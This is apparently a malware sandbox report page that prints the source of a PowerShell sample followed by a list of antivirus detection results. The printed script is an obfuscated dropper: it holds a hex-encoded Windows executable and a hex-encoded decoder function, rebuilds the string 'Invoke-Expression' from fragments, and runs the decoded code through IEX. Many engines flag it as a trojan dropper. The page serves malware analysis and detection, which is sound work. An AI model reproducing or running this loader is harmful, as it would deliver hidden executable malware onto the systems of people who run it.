Static | ZeroBOX
No static analysis available.
$HH1 = '4D5A9````3```````4``````FFFF````B8``````````````4```````````````````````````````````````````````````````````````````````8````````E1FBA`E``B4`9CD21B8`14CCD21546869732`7`726F6772616D2`63616E6E6F742`62652`72756E2`696E2`444F532`6D6F64652E`D`D`A24``````````````5`45````4C`1`3``F5E76261````````````````E````2```B`1`8````EA``````1`````````````4E`9`1````2```````2``1``````4`````2````````2`````4```````````````4````````````````6``1`````2`````````````2``4`85````1`````1`````````1`````1`````````````1```````````````````````F8`8`1``53````````2``1``F7`D``````````````````````````````````````4``1```C````````````````````````````````````````````````````````````````````````````````````````````````````````2``````8```````````````````````82`````48``````````````````````2E74657874``````54E9``````2```````EA```````2````````````````````````````2`````6`2E72737263``````F7`D``````2``1`````E``````EC````````````````````````````4`````4`2E72656C6F63`````C````````4``1`````2``````FA````````````````````````````4`````42````````````````````````
$AAAAAAA = '5b`53`74`72`-9`-e`-7`5d`24`48`31`3d`20`24`48`48`31`0a`4-`75`-e`-3`74`-9`-f`-e`20`48`32`20`7b`0a`20`0a`20`20`20`20`5b`43`-d`-4`-c`-5`74`42`-9`-e`-4`-9`-e`-7`28`29`5d`0a`20`20`20`20`5b`4f`75`74`70`75`74`54`79`70`-5`28`5b`-2`79`74`-5`5b`5d`5d`29`5d`0a`20`20`20`20`70`-1`72`-1`-d`28`0a`20`20`20`20`20`20`20`20`5b`50`-1`72`-1`-d`-5`74`-5`72`28`4d`-1`-e`-4`-1`74`-f`72`79`3d`24`74`72`75`-5`29`5d`20`5b`53`74`72`-9`-e`-7`5d`24`48`42`41`52`0a`20`20`20`20`29`0a`20`20`20`20`24`48`33`20`3d`20`4e`-5`77`2d`4f`-2`-a`-5`-3`74`20`2d`54`79`70`-5`4e`-1`-d`-5`20`-2`79`74`-5`5b`5d`20`2d`41`72`-7`75`-d`-5`-e`74`4c`-9`73`74`20`28`24`48`42`41`52`2e`4c`-5`-e`-7`74`-8`20`2f`20`32`29`0a`20`20`20`20`--`-f`72`20`28`24`-9`20`3d`20`30`3b`20`24`-9`20`2d`-c`74`20`24`48`42`41`52`2e`4c`-5`-e`-7`74`-8`3b`20`24`-9`20`2b`3d`20`32`29`20`7b`0a`20`20`20`20`20`20`20`20`24`48`33`5b`24`-9`20`2f`20`32`5d`20`3d`20`5b`43`-f`-e`7-`-5`72`74`5d`3a`3a`54`-f`42`79`74`-5`28`24`48`42`41`52`2e`53`75`-2`73`74`72`-9`-e`-7`28`24`-9`2c`20`32`29`2c`20`31`3-`2
$AAAAAAAAAAAAAAA = $AAAAAAA -split '`' |ForEach-Object {[char][convert]::ToUInt32($_,16) }
$RDTFYGUIHJODRGFHTGYJH = $AAAAAAAAAAAAAAA -join ''
$AA = 'In<<<<>>>>>>>ess'.Replace('<<<<>>>>>>>','voke-Expr') ; $BB= 'ion $R<<<<<>>>>>>H'.Replace('<<<<<>>>>>>','DTFYGUI');$CC='J<<<<<<<>.......JH'.Replace('<<<<<<<>.......','ODRGFHTGY')
I`E`X ($AA , $BB , $CC -Join '')|I`E`X
Antivirus Signature
Bkav Clean
Lionic Trojan.PowerShell.Agent.b!c
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren PSH/Agent.CM
Symantec ML.Attribute.HighConfidence
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Trojan-Dropper.PowerShell.Agent.bw
BitDefender Trojan.GenericKD.47257999
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Trojan.GenericKD.47257999
Rising Clean
Ad-Aware Trojan.GenericKD.47257999
Sophos Clean
Comodo Malware@#19mq41800c4q7
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Trojan.GenericKD.47257999
Emsisoft Trojan.GenericKD.47257999 (B)
Ikarus Clean
GData Trojan.GenericKD.47257999
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.Generic.D2D1198F
ViRobot Clean
ZoneAlarm Clean
Microsoft Trojan:Script/Oneeva.A!ml
AhnLab-V3 Clean
VBA32 Clean
ALYac Trojan.GenericKD.47257999
MAX malware (ai score=80)
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.